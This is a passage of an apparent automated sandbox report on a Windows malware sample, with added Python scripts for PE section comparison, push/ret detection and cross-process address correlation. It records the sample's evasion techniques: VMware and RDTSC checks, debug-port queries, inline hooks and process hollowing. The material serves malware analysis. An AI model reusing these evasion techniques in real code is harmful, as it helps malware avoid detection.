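            for n in sorted(set(d1) | set(d2)) if d1.get(n) != d2.get(n)}


E, R, W, C = 0x20000000, 0x40000000, 0x80000000, SCN_CNT_CODE
# Constructed: the report's on-disk section names with typical rights, and the
# file characteristics the report lists for the sample (0x010F).
DISK_PE = build_pe([(".text", C | E | R), (".rdata", R), (".data", R | W),
                    (".ndata", R | W), (".rsrc", R)], file_chars=0x010F)
# Constructed: the single-section image found at 0x400000 after unpacking;
# its file characteristics (EXECUTABLE_IMAGE | 32BIT_MACHINE) are assumed.
DUMP_PE = build_pe([(".text", C | E | R)], file_chars=0x0102)

if __name__ == "__main__":
    print("disk:", parse(DISK_PE)[0], layout(DISK_PE))
    print("dump:", parse(DUMP_PE)[0], layout(DUMP_PE))
    print("diff:", section_diff(DISK_PE, DUMP_PE))
```

On a real case, feed build-free input: the file from disk and the region read from the process at the image base (the report's 1.2.444890321.exe.400000.0.unpack is exactly such a dump). A section that keeps its name but gains W or E, or a table that shrinks to one executable section as here, both come out of section_diff.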
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_740D2F60 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_004198E6 pushad ; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00417AA0 push 00FCAB15h; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00416608 push esp; iretd
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00416FE8 push ss; retf
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009ED0D1 push ecx; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_004198E6 pushad ; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00417AA0 push 00FCAB15h; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00416608 push esp; iretd
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00416FE8 push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03247AA0 push 00FCAB15h; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_032498E6 pushad ; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CF5C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03246FE8 push ss; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03246608 push esp; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324CEFB push eax; ret
          Source: C:\Users\user\Desktop\444890321.exeFile created: C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dllJump to dropped file
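The push X; ret pairs listed above are disguised control transfers: push imm32; ret is a jmp to the immediate, and push reg; ret is a jmp to whatever the register holds, so a disassembler following only call/jmp edges loses the real flow. The script below is an added example (not part of the sandbox report or of the sample) that finds the exact byte encodings of the sequences named in this section in a raw code buffer and, for push imm32; ret, recovers the branch target. The byte string, the base address 0x00401000 and the image range 0x00400000-0x00430000 are constructed for the demo; the image range is an assumption, the report does not give the image size.

```python
"""Scan raw x86 code bytes for push/ret control-transfer sequences.

Added example, not code from the sandbox report or from the sample. It
matches the encodings of the sequences the report names (push reg; ret,
push imm32; ret, pushad; ret, push esp; iretd, push ss; retf) and recovers
the branch target of push imm32; ret, which is a disguised jmp.
"""
import struct

# Return-family opcodes that complete a sequence. retf and iretd also pop a
# segment selector (and EFLAGS), so those variants are normally junk bytes
# that never execute rather than real control flow.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx",
            0x54: "esp", 0x55: "ebp", 0x56: "esi", 0x57: "edi"}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
PUSHAD = 0x60
PUSH_IMM32 = 0x68


def find_push_ret(code, base=0, image_range=None):
    """Return [(address, description, target)] for each push-X; ret-family pair.

    target is the recovered destination for push imm32; ret and None
    otherwise. A byte scan does not know instruction boundaries, so a 0x50
    that is really a ModRM or immediate byte can produce a false hit: treat
    results as candidates to confirm in a disassembler.
    """
    hits = []
    i, n = 0, len(code)
    while i < n - 1:
        op = code[i]
        if op == PUSH_IMM32 and i + 5 < n and code[i + 5] in RET_OPCODES:
            target = struct.unpack_from("<I", code, i + 1)[0]
            note = ""
            if image_range and not image_range[0] <= target < image_range[1]:
                note = " (target outside image)"
            hits.append((base + i, f"push {target:08X}h; {RET_OPCODES[code[i + 5]]}{note}", target))
            i += 6
            continue
        mnemonic = None
        if op in PUSH_REG:
            mnemonic = f"push {PUSH_REG[op]}"
        elif op in PUSH_SEG:
            mnemonic = f"push {PUSH_SEG[op]}"
        elif op == PUSHAD:
            mnemonic = "pushad"
        if mnemonic and code[i + 1] in RET_OPCODES:
            hits.append((base + i, f"{mnemonic}; {RET_OPCODES[code[i + 1]]}", None))
            i += 2
        else:
            i += 1
    return hits


# Constructed sample: an ordinary prologue, then one of each sequence from
# the report, including the encoding of "push 00FCAB15h; ret" (68 15 AB FC 00 C3).
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp (benign)
    0x68, 0x15, 0xAB, 0xFC, 0x00, 0xC3,  # push 00FCAB15h; ret
    0x90,                                # nop
    0x50, 0xC3,                          # push eax; ret
    0x60, 0xC3,                          # pushad; ret
    0x54, 0xCF,                          # push esp; iretd
    0x16, 0xCB,                          # push ss; retf
    0x51, 0xC3,                          # push ecx; ret
    0xC3,                                # trailing ret
])
SAMPLE_BASE = 0x00401000                 # assumed load address of the snippet
IMAGE_RANGE = (0x00400000, 0x00430000)   # assumed bounds of the unpacked image


def scan_sample():
    """Scan the constructed buffer; the push imm32 hit lands outside the image."""
    return find_push_ret(SAMPLE_CODE, SAMPLE_BASE, IMAGE_RANGE)


if __name__ == "__main__":
    for addr, desc, _ in scan_sample():
        print(f"{addr:08X}  {desc}")
```

On the report's own figures the recovered target 0x00FCAB15 lies well above the unpacked image at 0x00400000, so that push imm32; ret at 1_2_00417AA0 either never executes or branches into memory the sample allocated at run time; the scan flags it for exactly that reason.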

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE2
Source: C:\Users\user\Desktop\444890321.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\backgroundTaskHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
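The code functions under Data Obfuscation appear in both process 1 (444890321.exe) and process 10 (WWAHost.exe) at addresses that differ by a constant, which is what the same code looks like once it has been written into a second process (the process hollowing the report flags). The script below is an added example (not part of the report or of the sample) that recovers those offsets from the report's own lines. It assumes the N_M_ADDRESS identifier in front of each code function means process index, analysis pass, virtual address, and that the fourth dot-separated field of a memory-dump name (00000001.00000002.265126021.0000000000A8F000...) is the dump's base address; both are readings of the report format, not documented facts. Run on the lines above it yields two offsets: 0x02E30000, shared by every payload function, and 0x03480000 for the single push ecx; ret function, which equals the distance between the two wntdll.pdb memory dumps listed for these processes, so that function sits in a separately mapped copy of ntdll rather than in the payload. The RDTSC addresses under Malware Analysis System Evasion below (0x004098E4 in process 1, 0x032398E4 in process 10) show the same 0x02E30000 offset.

```python
"""Correlate Joe Sandbox "Code function" addresses across two processes.

Added example, not part of the report or the sample. The identifier in
front of each code function is read as process-index_pass_address, so
10_2_03247AA0 is process 10, pass 2, address 0x03247AA0; the fourth field
of a memory-dump name is read as its base address. Both readings are
assumptions about the report format.
"""
import re
from collections import defaultdict

# Constructed input: the push/ret code functions the report lists for
# process 1 (444890321.exe) and process 10 (WWAHost.exe), copied verbatim.
REPORT_LINES = """
1_2_004198E6 pushad ; ret
1_2_00417AA0 push 00FCAB15h; ret
1_2_00416608 push esp; iretd
1_2_0041CEF2 push eax; ret
1_2_0041CEFB push eax; ret
1_2_0041CEA5 push eax; ret
1_2_0041CF5C push eax; ret
1_2_00416FE8 push ss; retf
1_2_009ED0D1 push ecx; ret
10_2_03E6D0D1 push ecx; ret
10_2_03247AA0 push 00FCAB15h; ret
10_2_032498E6 pushad ; ret
10_2_0324CF5C push eax; ret
10_2_03246FE8 push ss; retf
10_2_03246608 push esp; iretd
10_2_0324CEA5 push eax; ret
10_2_0324CEF2 push eax; ret
10_2_0324CEFB push eax; ret
""".strip().splitlines()

# Memory dumps named on the report's "wntdll.pdbUGP" line for the same processes.
WNTDLL_DUMPS = {
    1: "00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmp",
    10: "0000000A.00000002.470470953.0000000003F0F000.00000040.00000001.sdmp",
}

FUNC_RE = re.compile(r"^(\d+)_(\d)_([0-9A-Fa-f]{8})\s+(.+?)\s*$")


def parse_functions(lines):
    """Return {process_index: {instruction_text: set(addresses)}}."""
    by_proc = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = FUNC_RE.match(line.strip())
        if m:
            pid, _pass, addr, insn = m.groups()
            by_proc[int(pid)][" ".join(insn.split())].add(int(addr, 16))
    return by_proc


def relocation_deltas(by_proc, src, dst):
    """Find constant offsets that map code in process src onto process dst.

    Phase 1: an instruction text seen exactly once in each process gives an
    unambiguous delta. Phase 2: texts seen several times are checked against
    each candidate; a delta is credited only if it maps every src address
    onto a dst address. Returns {delta: [evidence strings]}.
    """
    a, b = by_proc[src], by_proc[dst]
    evidence = defaultdict(list)
    ambiguous = []
    for insn in sorted(set(a) & set(b)):
        if len(a[insn]) == 1 and len(b[insn]) == 1:
            (x,), (y,) = a[insn], b[insn]
            evidence[y - x].append(insn)
        else:
            ambiguous.append(insn)
    for insn in ambiguous:
        for delta in list(evidence):
            if {x + delta for x in a[insn]} == b[insn]:
                evidence[delta].append(f"{insn} ({len(a[insn])} addresses)")
    return dict(evidence)


def dump_base(dump_name):
    """Base address of a memory dump, read from its name (assumed format)."""
    return int(dump_name.split(".")[3], 16)


def summarize(src=1, dst=10):
    """One line per offset, best-supported first, tagged if it matches the ntdll dumps."""
    deltas = relocation_deltas(parse_functions(REPORT_LINES), src, dst)
    ntdll_delta = dump_base(WNTDLL_DUMPS[dst]) - dump_base(WNTDLL_DUMPS[src])
    lines = []
    for delta, proof in sorted(deltas.items(), key=lambda kv: -len(kv[1])):
        tag = " = offset between the two wntdll.pdb dumps" if delta == ntdll_delta else ""
        lines.append(f"+0x{delta:08X}{tag}: {', '.join(proof)}")
    return lines


if __name__ == "__main__":
    print("\n".join(summarize()))
```

The two-phase matching matters because push eax; ret occurs four times in each process; pairing those by text alone would yield sixteen candidate offsets, whereas checking the whole group against the offsets established by the unique functions confirms one and rejects the rest.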

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\444890321.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\444890321.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000032398E4 second address: 00000000032398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000003239B4E second address: 0000000003239B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\444890321.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00409A80 rdtsc
Source: C:\Windows\explorer.exe TID: 5972 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 5620 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\444890321.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\444890321.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\444890321.exe Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\System32\TileDataRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\system32\Windows.StateRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\SYSTEM32\usermgrcli.dll
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\system32\StateRepository.Core.dll
Source: C:\Windows\System32\backgroundTaskHost.exe File opened: C:\Windows\System32\usermgrproxy.dll
Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.234236228.00000000088C3000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.232735858.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.254896595.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.233860627.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.255132392.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.232897500.000000000871F000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAJ
Source: explorer.exe, 00000004.00000000.230436336.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\444890321.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\444890321.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0040ACC0 LdrLoadDll,
Source: C:\Users\user\Desktop\444890321.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009958EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009940E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BB8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A549A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A169A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A241E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
